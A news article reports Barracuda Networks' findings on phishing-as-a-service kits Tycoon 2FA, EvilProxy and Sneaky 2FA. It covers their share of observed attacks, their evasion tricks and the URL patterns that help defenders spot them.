Cybercriminals have increased phishing-as-a-service (Phaas) attempts in the first months of this year, making their attacks more complex and evasive.
From January to February, Barracuda Networks says it observed a million Phaas attacks, using the most popular Phaas tools Tycoon 2FA, EvilProxy, and Sneaky 2FA.
In February, an outbreak of attacks using the Tycoon 2FA tool was noticed, which was used in 89% of attacks overall.
Previously, Tycoon 2FA deployed malicious scripts to obstruct defenders' analysis of phishing pages, for example, by blocking shortcut keys. The malware developers have now abandoned that approach and replaced it with a more evasive tool.
To steal user credentials and exfiltrate them to an attacker-controlled server, Tycoon 2FA now encrypts the script with a Caesar cipher instead of storing it in plaintext.
“The upgraded script identifies a victim’s browser type, likely for evasion or attack customization. It also includes Telegram links which are often used to secretly send stolen data to attackers,” Barracuda Networks claims in a blogpost.
An indication of a Tycoon 2FA attack may be “.ru” top-level domain (the last part of a URL), and the victim’s email ID is embedded in the phishing URL either in the form of plain text or Base64-encoded.
EvilProxy, another tool used by hackers, which requires only minimal technical knowledge to operate, was used in 8% of the attacks.
Through phishing emails and malicious links, EvilProxy tricks victims into entering their credentials on seemingly legitimate login pages. It targets Microsoft 365, Google, and other cloud-based platforms through malicious links tricking users into entering their credentials on seemingly legitimate login pages.
EvilProxy attacks are harder to detect because they use a random URL. Users should be mindful of this and avoid entering their credentials if they think that the Microsoft/Google login page URL is different from the usual login page.
The third most popular Phaas tool, Sneaky 2FA, which targets Microsoft 365 accounts in search of credentials and access, was used in 3% of all Phaas attacks spotted by Barracuda Networks.
According to Barracuda Networks, a sign of Sneaky 2FA is that phishing URLs usually comprise 150 alphanumeric characters, followed by the path /index, /verify and /validate.
Your email address will not be published. Required fields are markedmarked